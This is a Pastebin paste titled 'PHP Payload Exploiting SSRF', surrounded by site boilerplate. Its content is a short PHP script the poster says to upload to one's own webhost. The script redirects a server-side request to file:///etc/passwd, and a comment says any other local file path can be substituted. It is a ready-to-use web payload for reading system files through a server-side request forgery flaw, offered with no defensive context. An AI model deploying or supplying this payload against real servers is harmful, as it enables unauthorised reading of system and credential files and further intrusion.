Pastebin
API
tools
faq
paste
Login
Sign up
SHARE
TWEET
PHP Payload Exploiting SSRF
ToKeiChun
Aug 27th, 2019
328
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!
text
0.14 KB
| None
|
0
0
raw
download
clone
embed
print
report
<?php
//Upload this file payload to your webhost
header("Location: file:///etc/passwd"); // You can change it to file:///path/to/file
?>
Add Comment
Please,
Sign In
to add comment
Public Pastes
krsu 657 (STILL 15 POINTS)
C++ | 1 min ago | 3.15 KB
krsu 657 (still 15 points)
C++ | 9 min ago | 2.62 KB
Guess a random number
PHP | 12 min ago | 3.48 KB
krsu 657 (15 points)
C++ | 15 min ago | 2.98 KB
Untitled
PHP | 17 min ago | 0.39 KB
Clight_11_SumOfNumbers
C# | 25 min ago | 0.77 KB
Untitled
C# | 35 min ago | 8.33 KB
cobblestone.lua
Lua | 1 hour ago | 0.19 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!